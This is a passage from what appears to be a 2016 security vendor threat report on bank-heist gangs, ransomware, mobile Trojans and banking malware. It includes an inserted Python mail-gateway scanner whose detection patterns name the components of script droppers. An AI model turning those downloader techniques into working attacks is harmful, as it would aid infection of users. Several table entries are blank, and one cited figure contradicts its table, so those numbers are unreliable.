Geographically, the biggest concentration of victims has also changed over the last four years. In 2013, the targets were mostly in Spanish- and Arabic-speaking countries. The following year, cybercriminals focused on Turkey and India, as well as the United Arab Emirates, the United States and Vietnam. In 2015, Russia topped the rating with the United Arab Emirates, Turkey, the United States and Germany close behind.

Fortunately, our investigation was not in vain – a few days after its publication, the JSocket website stopped working and the Adwind author ceased their activity. Since then, no new versions of the Trojan have appeared. Perhaps we can expect another reincarnation of the Trojan, or maybe this is the end of the story.

Banking threats

At the Security Analyst Summit 2016 (SAS 2016), Kaspersky Lab announced the discovery of two new gangs engaged in APT-style bank robberies, Metel and GCMAN, and the reemergence of the Carbanak group with new targets in its sights.

In 2015, Kaspersky Lab researchers conducted incident response investigations for 29 organizations located in Russia that were infected by these three groups.

There are other cybercriminal groups currently attacking banks in Russia, but these three are the most active and are involved in the most high-profile thefts from both customer bank accounts and the banks themselves.

The activity of Carbanak 2.0 is of particular interest. In December 2015, Kaspersky Lab confirmed that the group was still active after discovering signs of Carbanak in a telecommunications company and a financial organization. An interesting feature of the Carbanak 2.0 group is that they have a different type of victim. The group has moved beyond banks and is now targeting the budgeting and accounting departments of any organization that interests them, using the same APT-style tools and techniques.

In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stored information about shareholders to change the ownership details of a major company. The information was modified to name a money mule as a shareholder of the company, displaying their IDs.


Yet another criminal gang, known as Buhtrap, came to the fore in the first quarter. It is responsible not only for the theft of hundreds of millions of rubles from Russian banks but also for organizing a targeted attack on banks using the name and attributes of FinCERT, a special department of the Central Bank of Russia created to detect cyberattacks and notify member banks. It was the first time attackers had used the FinCERT "brand", and the attack was carefully prepared: a corresponding domain name was registered and the identifiers used by FinCERT were studied closely.

The malicious mass mailing affected hundreds of banks in Russia. The attackers had a database of bank employees' email addresses, including first names and surnames. A legitimate remote administration tool was used as the remote access module installed on the system.


On the global arena, the most prominent attack on banks was that involving the Central Bank of Bangladesh. It was not just the object of the attack – the Central Bank – that was remarkable but also the amount of money the attackers managed to steal, plus the amount they tried to steal but failed.

The investigation is still ongoing, but according to the information that has been made public, it is possible to put together a picture of what happened. Back in early February, hackers managed to access the workstations of several employees at the national bank. Using their identities, the fraudsters began to send out transfer orders for money held in different banks including the New York Federal Reserve Bank. With full access and posing as employees, they were able to steal approximately $80 million. The money was transferred to accounts in the Philippines and then passed through a money-laundering scheme involving local casinos and forex brokers.

Another $20 million would have been transferred to Sri Lanka, but the hackers made an error in the name of a recipient organization; this aroused the suspicion of Deutsche Bank, which was the correspondent bank of the Central Bank of Bangladesh. An investigation found that the payment order had been initiated by hackers, and approximately $900 million was still waiting to be transferred.

It’s worth noting that Bangladesh’s Minister of Finance only learned about the incident a month later from the mass media. The head of the Central Bank was forced to resign, the investigators are currently trying to trace those responsible, and the bank is taking measures to return at least some of the stolen funds.

Ransomware Trojans

As we mentioned above, ransomware Trojans were the main theme of the quarter and could well become the main problem of the year.

Making the situation worse is the fact that the source code of a number of ransomware Trojans has become accessible to anyone with a little cyber know-how. As a consequence, even the average script kiddie can deploy their own version of a Trojan, which, together with the widespread use of Bitcoin for paying ransoms, makes it much easier to organize attacks with impunity.

Moreover, the term Ransomware-as-a-Service (RaaS) has already come into use. This involves the attackers offering to pay for Trojan distribution, promising a cut of any ransom money received. The clients of these services are usually webmasters of porn sites. There are services that work the other way round, offering a complete set of tools to the encryptor who takes responsibility for distributing the Trojan and takes 10% of the ransom as commission.

According to reports from several companies, the first quarter of 2016 saw incidents where ransomware was used by a number of well-known APT-groups, mainly Chinese. We also identified similar cases, and not only involving Chinese groups. If these incidents become a trend, the threat will move to a new level because the damage caused by ransomware is not much different from that caused by Wiper-type Trojans. In both cases, user data becomes inaccessible.

In addition, ransomware Trojans are expanding their sphere of activity; in Q1 2016, CTB-Locker targeted web servers.

The earlier version of CTB-Locker known as crypto-ransomware Onion differed from other ransomware in that it used the anonymous network Tor to protect its command servers from being disabled because, as a rule, it is only possible to disable static servers. The use of Tor also helped the malware avoid detection and blocking. There was one more thing that protected CTB-Locker operators: payment was only accepted in Bitcoins, a decentralized anonymous cryptocurrency.

The new version of this malicious program encrypts web servers, and demands less than half a Bitcoin (~ $150) as ransom. If the money is not paid on time, the ransom is doubled to about $300. Once the ransom is paid, a key is generated to decrypt the web server files.

However, the biggest crypto epidemic of Q1 2016 was caused by the ransomware Trojan Locky (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Locky).

This Trojan is continuing to spread; Kaspersky Lab products have recorded attempts to infect users in 114 countries around the world.

In order to spread the Trojan, the cybercriminals use mass mailings in which malicious loaders are attached to spam messages. Initially, the malicious spam messages contained a DOC file attachment with a macro that downloaded the Locky Trojan from a remote server and executed it.

At the time of writing, the malicious spam is still being sent, but instead of DOC files being attached there are now ZIP archives containing one or more obfuscated scripts in JavaScript. The messages are mostly in English, though some bilingual variants have appeared.

The most significant technical innovation in ransomware was full disk encryption (more specifically, encryption of the file system's master file table) rather than file-by-file encryption. This trick was used by the Petya Trojan (the fact that it has a Russian name does not necessarily mean it was created by Russian-speaking malware writers).

After encrypting the master file table (MFT), Petya shows its true face: a skull and crossbones composed of ASCII characters. Then the typical encryptor routine begins: the Trojan demands a ransom from the victim, in this case 0.9 Bitcoin (about $380).

At this stage, the only thing that distinguishes Petya from other ransomware is the fact that it operates without an Internet connection. This is hardly surprising though, because Petya basically “eats” the operating system, including its ability to connect to the Internet. This means the user has to go to another computer to pay the ransom and recover their data.

In March, yet another encryptor for Mac OS X was discovered: Trojan-Ransom.OSX.KeRanger. The attackers used it to infect two BitTorrent client installers from the open source Transmission project, which were available for download on the project's official website. Most likely, the site was hacked and the downloadable files were replaced with malicious recompiled versions. The KeRanger encryptor was signed with a valid Apple developer certificate and could therefore bypass the Gatekeeper security feature.

Statistics on Trojan encryptors

Encryptors belong to the Trojan-Ransom class of malware, i.e. to ransomware. Today, in addition to encryptors this class of malicious programs also includes so-called browser ransomware. In the general flow of Trojan-Ransom detections the share of browser ransomware accounts for 25%, and that is mainly in Russia and the CIS. In this section, we will not dwell on browser ransomware, but will look at malicious encryptors in more detail.

The number of new Trojan-Ransom encryptors

The following graph represents the rise in the number of newly created encryptor modifications over the last two quarters.

Number of Trojan-Ransom encryptor modifications in Kaspersky Lab’s Virus Collection (Q4 2015 vs Q1 2016)

The overall number of encryptor modifications in our Virus Collection to date is at least 15,000. Nine new encryptor families and 2,900 new modifications were detected in Q1.

The number of users attacked by encryptors

Number of users attacked by Trojan-Ransom encryptor malware (Q1 2016)

In Q1 2016, 372,602 unique users were attacked by encryptors, which is 30% more than in the previous quarter. Approximately 17% of those attacked were in the corporate sector.

It is important to keep in mind that the real number of incidents is several times higher: the statistics reflect only the results of signature-based and heuristic detections, while in most cases Kaspersky Lab products detect encryption Trojans based on behavior recognition models and issue the Generic verdict, which does not distinguish the types of malicious software.

Top 10 countries attacked by encryptors

     Country*       % of users attacked by encryptors**
 1   Italy          3.06
 2   Netherlands    1.81
 3   Belgium        1.58
 4   Luxembourg     1.36
 5   Bulgaria       1.31
 6   Croatia        1.16
 7   Rwanda         1.15
 8   Lebanon        1.13
 9   Japan          1.11
10   Maldives       1.11

* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by Trojan-Ransom encryptor malware as a percentage of all unique users of Kaspersky Lab products in the country.

In Q1, the first six places in the Top 10 were occupied by European countries. Italy (3.06%) topped the rating; the most widespread encryptor family in this country was Teslacrypt (Trojan-Ransom.Win32.Bitman). Italy was followed by the Netherlands (1.81%) and Belgium (1.58%).

Top 10 most widespread encryptor families

     Name                     Verdict*                                                     Percentage of users**
 1   Teslacrypt               Trojan-Ransom.Win32.Bitman / Trojan-Ransom.JS.Cryptoload     58.43%
 2   CTB-Locker               Trojan-Ransom.Win32.Onion / Trojan-Ransom.NSIS.Onion         23.49%
 3   Cryptowall / Cryptodef   Trojan-Ransom.Win32.Cryptodef                                 3.41%
 4   Cryakl                   Trojan-Ransom.Win32.Cryakl                                    3.22%
 5   Scatter                  Trojan-Ransom.BAT.Scatter / Trojan-Downloader.JS.Scatter /
                              Trojan-Dropper.JS.Scatter / Trojan-Ransom.Win32.Scatter       2.47%
 6   Rakhni                   Trojan-Ransom.Win32.Rakhni / Trojan-Downloader.Win32.Rakhni   1.86%
 7   Locky                    Trojan-Ransom.Win32.Locky                                     1.30%
 8   Shade                    Trojan-Ransom.Win32.Shade                                     1.21%
 9   iTorLock / Troli         Trojan-Ransom.MSIL.Lortok                                     0.84%
10   Mor / Gulcrypt           Trojan-Ransom.Win32.Mor                                       0.78%

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

First place in Q1 was occupied by the Teslacrypt family represented by two verdicts: Trojan-Ransom.Win32.Bitman and Trojan-Ransom.JS.Cryptoload. The second verdict is typical for scripts that are sent out in ZIP archives as part of spam mailings. In the past, these scripts downloaded malware such as Fareit and Cryptowall, but recently the attackers have switched to TeslaCrypt. Noticeably, in Q1 new versions of this encryptor with an improved encryption algorithm were spread this way: the authors used the “reliable” RSA-4096 instead of AES.
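Both the Locky spam described earlier (ZIP archives containing obfuscated JavaScript) and the Trojan-Ransom.JS.Cryptoload scripts mentioned here share a delivery pattern that a mail gateway can check for. The Python below is an added example, not Kaspersky Lab's detection logic: it unpacks a ZIP attachment in memory, flags entries with extensions Windows will execute on double-click, and scores JScript entries for the COM objects and string-building tricks typical of these downloaders. The sample archive, its file names and the inert stand-in script are constructed for the example; the marker list and the blocking threshold are the author's assumptions, not a published signature.

```python
"""Mail-gateway style check for ZIP attachments carrying script droppers (the Locky and
Cryptoload pattern). Added example, not Kaspersky Lab's detection logic."""
import io
import os
import re
import zipfile

# Extensions that Windows executes straight from a double-click in Explorer.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
               ".cmd", ".bat", ".scr", ".exe"}
# Text-based script entries whose contents are worth scoring.
_TEXT_SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}

# Hallmarks of the obfuscated downloaders: the COM objects used to fetch and run a payload,
# and the string-building tricks used to keep those names out of plain signatures.
_DOWNLOADER_MARKERS = [
    re.compile(r"ActiveXObject|CreateObject", re.I),
    re.compile(r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    re.compile(r"ADODB\.Stream", re.I),
    re.compile(r"WScript\.Shell|Shell\.Application", re.I),
    re.compile(r"\beval\s*\(|String\.fromCharCode|unescape\s*\(|\bExecute\b", re.I),
]


def obfuscation_score(script: str) -> int:
    """Number of downloader markers present, plus structural hints of obfuscation."""
    score = sum(1 for p in _DOWNLOADER_MARKERS if p.search(script))
    longest = max((len(line) for line in script.splitlines()), default=0)
    if longest > 400:                                   # whole program on one huge line
        score += 1
    if script.count("+") > 0.02 * len(script):          # dense string concatenation
        score += 1
    return score


def scan_zip_attachment(data: bytes) -> list:
    """Return (entry name, reason, score) for each entry a gateway should block or review."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<attachment>", "not a valid ZIP archive", 1)]
    findings = []
    with archive:
        for info in archive.infolist():
            root, ext = os.path.splitext(os.path.basename(info.filename))
            ext = ext.lower()
            if ext not in SCRIPT_EXTS:
                continue
            score, reason = 1, f"directly executable attachment type {ext}"
            if os.path.splitext(root)[1]:                # invoice.pdf.js style
                reason += ", double extension"
                score += 1
            if ext in _TEXT_SCRIPT_EXTS:
                body = archive.read(info).decode("utf-8", errors="replace")
                score += obfuscation_score(body)
            findings.append((info.filename, reason, score))
    return findings


def should_block(findings: list, threshold: int = 2) -> bool:
    """Block when any entry reaches the threshold; lower scores go to manual review."""
    return any(score >= threshold for _, _, score in findings)


# ---- constructed fixture (not a real sample) --------------------------------------------
def build_sample_zip(with_script: bool = True) -> bytes:
    """A ZIP shaped like the spam attachments described, with an inert stand-in script."""
    script = (
        'var s = "WScr" + "ipt.Sh" + "ell";\n'                        # split to dodge signatures
        'var o = new ActiveXObject("MSXML2.XMLHTTP");\n'
        'eval(String.fromCharCode(118, 97, 114, 32, 120, 61, 49));\n'  # evaluates "var x=1"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("readme.txt", "nothing to see here")
        if with_script:
            z.writestr("invoice_2016-03-14.pdf.js", script)
    return buf.getvalue()


if __name__ == "__main__":
    findings = scan_zip_attachment(build_sample_zip())
    for name, reason, score in findings:
        print(f"{name}: {reason} (score {score})")
    print("block:", should_block(findings))
```

The extension check alone catches the Locky wave; the content scoring is there because the same gateways see plenty of legitimate `.js` in developer mail, and a bare script extension is better sent to review than rejected outright. Note that nested archives and password-protected ZIPs (a trick the same campaigns adopted later) are out of scope here and would need their own handling.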

Second came the CTB-Locker (Trojan-Ransom.Win32.Onion / Trojan-Ransom.NSIS.Onion) family. The members of this family are usually distributed via an affiliate program and are localized in many languages. As mentioned above, in the first quarter of 2016 a new variant of CTB-Locker that targets web servers only was discovered. It has already successfully encrypted web-root files on more than 70 servers located in 10 countries.

The Trojan-Ransom.Win32.Cryptodef family also known as Cryptowall came third. Its representatives, as in the case of Teslacrypt, are spread via spam mass mailings.

In fifth place is the Scatter family. Earlier this year, a new wave of spam mailings distributing this encryptor was registered. The emails contained a link to a JS script disguised so that the user would download and launch it locally. Interestingly, when the script runs it saves two other malicious programs to disk in addition to Scatter: Nitol (a DDoS bot) and Pony (a Trojan designed to steal information, mostly passwords).

The Locky family, which occupied seventh place in the Q1 rating, was notable for its wide geographic spread, mainly across Europe. Located on the Tor network, the site containing the criminals’ demands supports more than two dozen languages, which doesn’t include Russian or other CIS languages. This may mean that cybercriminals are not interested in attacking victims in these countries, something that is confirmed by the KSN statistics.


All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Mobile threats

Cybercriminals keep refining techniques for deceiving users. This quarter we identified two mobile Trojans that counter standard security mechanisms of the operating system. One version of Trojan-Banker.AndroidOS.Asacub overlays the regular system window requesting device administrator privileges with its own window containing buttons; the Trojan thereby hides from the user the fact that it is gaining elevated privileges and tricks them into approving the request. Another Trojan uses a similar method: in recent versions of Android the system asks for the user's approval when an SMS is sent to a premium-rate number, and the Tiny SMS Trojan overlays this dialog with its own screen without covering the buttons in the original window.

Request screen of overlaying a notification about the sending of an SMS to a premium-rate number (The message states: Would you like to send a request to receive a gaming database?)

The Trojan's request is presented in such a way that the user will most probably agree to send the SMS to a premium-rate number without the slightest idea of what will happen next.

In the Q3 2015 report we mentioned the banking Trojan Trojan-Banker.AndroidOS.Marcher. This quarter, we were able to detect new versions of Marcher which attacked nearly 40 banking apps, mostly belonging to European banks. Unlike most other mobile Trojans, Marcher uses phishing web pages rather than its own windows to overlay banking app screens.

In Q1, we saw an increase in activity by the mobile ransomware Trojan-Ransom.AndroidOS.Fusob.pac, which blocks the user's device and demands a ransom to unblock it. In the first three months of 2016, Fusob became the most popular mobile Trojan of this type, accounting for over 64% of users attacked by mobile ransomware. The total number of users attacked by mobile ransomware Trojans increased more than 1.8 times compared to the previous quarter.

The number of new mobile threats

In Q1 2016, Kaspersky Lab detected 2,045,323 malicious installation packages – this is 11 times greater than in Q4 2015, and 1.2 times more than in Q3 2015.

Number of detected malicious installation packages (Q2 2015 – Q1 2016)

Distribution of mobile malware by type

Distribution of new mobile malware by type, Q1 2016 vs. Q4 2015

In Q1 2016, adware programs continued to top the rating of detected malicious objects for mobile devices. The share of adware grew 13 p.p. compared to Q4 2015, reaching 42.7%. Notably, this is still lower than in Q3 2015 (52.5%).

Second place is occupied by SMS Trojans, and for the second quarter in a row the share of detections of this type grew. In Q4 2015 the share of SMS Trojans rose sharply from 6.2% to 19.8%, and in Q1 2016 it grew by another 0.7 p.p. to 20.5%.

Trojan spyware programs, with a 10% share, were right behind the SMS Trojans. These programs steal the user’s personal data, including incoming messages (mTANs) from banks.

RiskTool software, i.e. legitimate applications that are potentially dangerous to users, had occupied first or second place in this rating for nearly two years. However, starting in Q4 2015 it fell to fifth place. In Q4 2015 its share was 5.6%, and in Q1 2016 7.4%.

The share of banking Trojans has continued to grow, and amounted to 1.2% in Q1 2016.

TOP 20 mobile malware programs

Please note that this ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

     Name                                    % of attacked users*
 1   DangerousObject.Multi.Generic           73.7
 2   Backdoor.AndroidOS.Ztorg.c              11.3
 3   Trojan.AndroidOS.Iop.c                   8.9
 4   Trojan.AndroidOS.Ztorg.a                 8.7
 5   Trojan-Ransom.AndroidOS.Fusob.pac        6.2
 6                                            4.6
 7   Trojan-Clicker.AndroidOS.Gopl.a          4.5
 8   Backdoor.AndroidOS.Ztorg.b               4.3
 9   Trojan.AndroidOS.Iop.m                   3.7
10   Trojan.AndroidOS.Agent.ej                3.7
11   Trojan.AndroidOS.Iop.q                   3.5
12   Trojan.AndroidOS.Ztorg.i                 3.3
13   Trojan.AndroidOS.Muetan.b                3.1
14                                            3.1
15   Trojan-SMS.AndroidOS.Podec.a             3.1
16   Trojan-Downloader.AndroidOS.Leech.a      3.0
17   Trojan-Dropper.AndroidOS.Guerrilla.b     2.8
18                                            2.8
19   Backdoor.AndroidOS.Ztorg.a               2.8
20   Backdoor.AndroidOS.Triada.d              2.4

* Percentage of users attacked by the malware in question, relative to all users attacked

First place is occupied by DangerousObject.Multi.Generic (44.2%), used for malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

An increasing number of entries in the TOP 20 are occupied by Trojans that use advertising as their main means of monetization. Their goal is to deliver as much advertisements as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them. In Q1, 16 such programs made it into the TOP 20: three programs from the family Backdoor.AndroidOS.Ztorg, three from the family Trojan.AndroidOS.Iop, two from the family Trojan.AndroidOS.Ztorg, plus, Trojan-Clicker.AndroidOS.Gopl.a, Trojan.AndroidOS.Agent.ej, Trojan.AndroidOS.Muetan.b,, Trojan-Downloader.AndroidOS.Leech.a, Trojan-Dropper.AndroidOS.Guerrilla.b, and Backdoor.AndroidOS.Triada.d.

Backdoor.AndroidOS.Triada is a new entry in the TOP 20 of mobile malware. The main function of this Trojan is to redirect financial SMS transactions when the user makes online payments to buy additional content in legitimate apps. The money goes to the attackers rather than to the software developer. Triada is the most complex mobile malware program that we know of. Its distinctive feature is the use of the Zygote process to inject its code into the context of all the applications on the device. Triada penetrates virtually all applications running on the infected device, and exists in RAM only. In addition, all the Trojan’s separately launched processes are concealed from the user and other applications.

The ransomware Trojan Trojan-Ransom.AndroidOS.Fusob.pac is in fifth place (6.2%). This Trojan demands a $200 ransom from victims to unblock their devices. A substantial number of the victims are located in North America (the US and Canada) and Europe (mostly in Germany, Italy, the UK, Spain and Switzerland).

Trojan-SMS.AndroidOS.Podec.a (3%) has spent over a year now in the mobile malware TOP 20, although now it is beginning to lose ground. Earlier it was consistently among the top 5 mobile threats, but in Q1 2016 it only made it into the bottom half of the rating. The number of users attacked by this Trojan fell 1.7 times compared to Q4 2015. Its functionality has remained practically unchanged; the main means of monetization is still achieved by subscribing the user to paid services.

Also making it into the rating is, an exploit used to gain local super-user rights.

The geography of mobile threats

The geography of mobile malware infection attempts in Q1 2016 (percentage of all users attacked)

Top 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country*         % of users attacked**
1   China          38.2
2   Bangladesh     27.6
3   Uzbekistan     21.3
4   Algeria        17.6
5   Nigeria        17.4
6   India          17.0
7   Philippines    15.7
8   Indonesia      15.6
9   Ukraine        15.0
10  Malaysia       14.0

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

China topped the ranking, with 40% of users encountering a mobile threat at least once during the year. To recap, in 2015 China also came first in the ranking.

In all the countries of the Top 10 except for China the most popular mobile malware was the same – advertising Trojans that appeared in the TOP 20 mobile malware, and AdWare. In China, a significant proportion of attacks also involved advertising Trojans, but the majority of users encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families. Representatives of the RiskTool.AndroidOS.SMSreg family were also popular. If used carelessly, these programs could result in money being withdrawn from a mobile account.

The safest countries are Taiwan (2.9%), Australia (2.7%) and Japan (0.9%).

Mobile banking Trojans

Over the reporting period, we detected 4,146 mobile Trojans, which is 1.7 times more than in the previous quarter.

Number of mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2015 – Q1 2016)

Geography of mobile banking threats in Q1 2016 (number of users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile banker Trojans.

Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country*         % users attacked**
1   China          0.45
2   Australia      0.30
3   Russia         0.24
4   Uzbekistan     0.20
5   Ukraine        0.08
6   France         0.06
7   Byelorussia    0.05
8   Turkey         0.05
9   Japan          0.03
10  Kazakhstan     0.03

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2016, first place was occupied by China where the majority of affected users encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families of mobile banker Trojans. In second place was Australia where the Trojan-Banker.AndroidOS.Acecard family was replaced by the Trojan-Banker.AndroidOS.Marcher family as the most popular threat.

TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users

An indication of how popular mobile banker Trojans are with cybercriminals in each country can be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the quarter, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking differs from the one above:

Country*           % users attacked**
1   Australia        13.4
2   Russia            5.1
3   United Kingdom    1.6
4   Turkey            1.4
5   Austria           1.3
6   France            1.3
7   Poland            1.2
8   China             1.1
9   Hong Kong         1.0
10  Switzerland       0.9

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country.

To recap, Australia was among the Top 3 countries with the lowest percentage of users attacked by mobile malware. However, in this ranking Australia ended in first place: more than 13% of all users attacked by mobile malicious programs were attacked by mobile bankers. Meanwhile China, which came first in the previous ranking, ended the quarter in tenth place. In other words, in China the cybercriminals’ mobile banking Trojans are less popular than other types of mobile malware.

Mobile Trojan-Ransom

In Q1 2016, we detected 2,896 mobile ransomware samples, which is 1.4 times more than in the previous quarter.

Number of mobile Trojan-Ransomware programs detected by Kaspersky Lab (Q2 2015 – Q1 2016)

TOP 10 countries attacked by Trojan-Ransomware as a percentage of attacked users:

Country*           % of users attacked**
1   Kazakhstan       0.92
2   Germany          0.83
3   Uzbekistan       0.80
4   Canada           0.71
5   Italy            0.67
6   Netherlands      0.66
7   United Kingdom   0.59
8   Switzerland      0.58
9   USA              0.55
10  Spain            0.36

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users attacked by mobile malware in the country.

In all the countries of the TOP 10, except for Kazakhstan and Uzbekistan, the most popular Trojan-Ransom family was Fusob, especially its Trojan-Ransom.AndroidOS.Fusob.pac modification (note, this malicious program was fifth in the ranking of mobile threats).

In Kazakhstan and Uzbekistan, which came first and third respectively, the main threat to users originated from representatives of the Small family of mobile Trojan-Ransom. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demands $10 to unblock it.

Vulnerable applications used by cybercriminals

In Q1 2016, exploits for Adobe Flash Player remained popular. During the reporting period two new vulnerabilities in this software were detected:

  • CVE-2015-8651
  • CVE-2016-1001

The first exploit pack to add support for these vulnerabilities was Angler.

One notable event in the first quarter was the use of an exploit for Silverlight – CVE-2016-0034. At the time of publication, this vulnerability is used by the Angler and RIG exploit packs.

As is now traditional, some popular packs included an exploit for the Internet Explorer (CVE-2015-2419) vulnerability.

The overall picture of the use of exploits in the first quarter looks as follows:

Distribution of exploits used in attacks by the type of application attacked, Q1 2016

As expected, we have seen a decline in the share of exploits for Java (-3 percentage points) and an increase in the use of Flash exploits (+1 p.p.). There was also a significant increase in the percentage of exploits for Microsoft Office (+10 p.p.): this group mainly includes exploits for vulnerabilities in Microsoft Word. This significant growth was caused by spam mailings containing these exploits.

Overall, the first quarter of 2016 continued the trend of the past few years – cybercriminals are focused on exploits for Adobe Flash Player and Internet Explorer. In our chart, the latter is included in the “Browsers” category together with detections of landing pages that “distribute” exploits.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the first quarter of 2016, Kaspersky Lab’s web antivirus detected 18,610,281 unique malicious objects: scripts, exploits, executable files, etc. 74,001,808 unique URLs were recognized as malicious by web antivirus components.

Online threats in the banking sector

In the first three months of 2016, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 459,970 computers. We are witnessing a decline in financial malware activity: the figure for Q1 is 23.3% lower than in the previous quarter (597,415). A year ago, in Q1 2015 this figure was 699,652, which translates into a 34.26% fall in the number of victims over the past year.

Number of attacks by financial users, Q1 2016

Geography of attacks

To evaluate and compare the degree of risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the country.

Geography of banking malware attacks in Q1 2016 (percentage of attacked users)

Top 10 countries by the percentage of attacked users

Country*                  % attacked users**
1   Brazil                  3.86
2   Austria                 2.09
3   Tunisia                 1.86
4   Singapore               1.83
5   Russia                  1.58
6   Venezuela               1.58
7   Morocco                 1.43
8   Bulgaria                1.39
9   Hong Kong               1.37
10  United Arab Emirates    1.30

These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q1 2016, Brazil had the highest percentage of Kaspersky Lab users who were attacked by banking Trojans. One of the reasons for the growth of financial threats in this country was the emergence of cross-platform Trojan bankers. Noticeably, most countries in the TOP 10 have a high level of technological development and/or well-developed banking system which attracts cybercriminals.

In Russia, 1.58% of users encountered a banking Trojan at least once in Q1 (an increase of 1 p.p. compared to the previous quarter). In the US, the figure was 0.26%; Spain – 0.84%; Italy – 0.79%; Germany – 0.52%; the UK – 0.48%; France – 0.36%.

The Top 10 banking malware families

The table below shows the Top 10 malware families most commonly used in Q1 2016 to attack online banking users:

Name                                   Number of users attacked
1   Trojan-Spy.Win32.Zbot                419,940
2   Trojan-Downloader.Win32.Upatre       177,665
3   Trojan-Banker.Java.Agent              68,467
4   Trojan-Banker.Win32.Gozi              53,978
5   Trojan-Banker.Win32.BestaFera         25,923
6   Trojan.Win32.Tinba                    24,964
7   Trojan-Banker.Win32.Banbra            22,942
8   Trojan-Banker.AndroidOS.Agent         19,782
9   Trojan-Banker.AndroidOS.Abacus        13,446
10  Trojan-Banker.Win32.ChePro             9,209

Trojan-Spy.Win32.Zbot topped the ranking. It has become a permanent resident in this ranking, and it is no coincidence that it consistently occupies a leading position. The Trojans of the Zbot family were among the first to use web injections to compromise the payment details of online banking users and to modify the contents of banking web pages. They encrypt their configuration files at several levels; the decrypted configuration file is never stored in the memory in its entirety, but is instead loaded in parts.

The Trojan-Downloader.Win32.Upatre family of malicious programs came second in Q1 2016. The malware is no larger than 3.5 KB in size, and is limited to downloading the payload to the victim computer, most typically a banker Trojan from the Dyre/Dyzap/Dyreza family. The main aim of this family of banking Trojans is to steal the user’s payment details. Dyre does this by intercepting the data from a banking session between the victim’s browser and the online banking web app, in other words, it uses the “Man-in-the-Browser” (MITB) technique.

It is worth noting that the vast majority of the TOP 10 malware uses the technique of embedding arbitrary HTML code in the web page displayed by the browser and intercepting payment data entered by the user into the original and the inserted web forms.

The TOP 3 threats in the first quarter of 2016 include cross-platform banking malware written in Java. Brazilian cybercriminals have started actively using cross-platform Java Trojans. In addition, Kaspersky Lab experts detected new malicious software also written in Java and used to steal financial information – Adwind RAT. Adwind is written entirely in Java, which is why it can attack all popular platforms: Windows, Mac OS, Linux and Android. The malicious program allows attackers to collect and extract data from the system, as well as remotely control an infected device. To date, it is able to take screenshots, log keystrokes, steal passwords and data stored in browsers and web forms, take photos and videos via the webcam, make audio recordings using the microphone built into the device, collect general data about the user and the system, steal VPN certificates and keys from cryptocurrency wallets and, finally, manage SMS.

Fourth place in the TOP 10 is occupied by Trojan-Banker.Win32.Gozi, which penetrates working processes of popular web browsers to steal payment information. Some samples of this Trojan can infect the MBR (Master Boot Record) and maintain their presence in the operating system, even if it has been reinstalled.

One of the most interesting pieces of malware designed to steal financial data that did not make it into the TOP 10 is Gootkit. It is written using the software platform NodeJS and has a modular architecture. The malicious code interpreter is contained in its body; as a result, it is big – approximately 5 MB. To steal payment data, Gootkit uses http traffic interception and embeds itself in the browser. Other standard Trojan features include execution of arbitrary commands, auto-update, and capturing screenshots. However, this banking Trojan is not particularly widespread.

Top 10 countries where online resources are seeded with malware

